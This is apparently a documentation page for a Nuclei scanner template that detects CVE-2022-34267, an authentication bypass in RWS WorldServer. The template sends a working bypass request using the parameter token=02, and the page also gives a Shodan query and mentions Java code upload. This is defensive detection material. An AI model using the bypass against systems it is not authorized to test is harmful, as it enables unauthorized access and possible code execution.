Skip to content
Nuclei Templates

RWS WorldServer - Authentication Bypass

ID: CVE-2022-34267

Severity: critical

Author: pdresearch,iamnoooob,rootxharsh,parthmalhotra

Tags: cve,cve2022,worldserver,auth-bypass

Description

Section titled “Description”

An issue was discovered in RWS WorldServer before 11.7.3. Adding a token parameter with the value of 02 bypasses all authentication requirements. Arbitrary Java code can be uploaded and executed via a .jar archive to the ws-api/v2/customizations/api endpoint.

YAML Source

Section titled “YAML Source”
id: CVE-2022-34267


info:
  name: RWS WorldServer - Authentication Bypass
  author: pdresearch,iamnoooob,rootxharsh,parthmalhotra
  severity: critical
  description: |
    An issue was discovered in RWS WorldServer before 11.7.3. Adding a token parameter with the value of 02 bypasses all authentication requirements. Arbitrary Java code can be uploaded and executed via a .jar archive to the ws-api/v2/customizations/api endpoint.
  reference:
    - https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver
    - https://www.rws.com/localization/products/trados-enterprise/worldserver/
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-34267
    cwe-id: CWE-287
    epss-score: 0.00106
    epss-percentile: 0.43655
    cpe: cpe:2.3:a:rws:worldserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rws
    product: worldserver
    shodan-query: title:"WorldServer"
  tags: cve,cve2022,worldserver,auth-bypass


http:
  - raw:
      - |
        GET /ws-api/v2/users/me/details?token=02 HTTP/2
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"fullName":"System"'


      - type: word
        part: content_type
        words:
          - "application/json"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502210097ce8a094cba718d6936c7434e4865dcc878a044daae2c65188a1f50215671ae02205650512a16920c0fb9a4b016073f263da961d039e85a112ada30aa8a6af933d8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-34267.yaml"

View on Github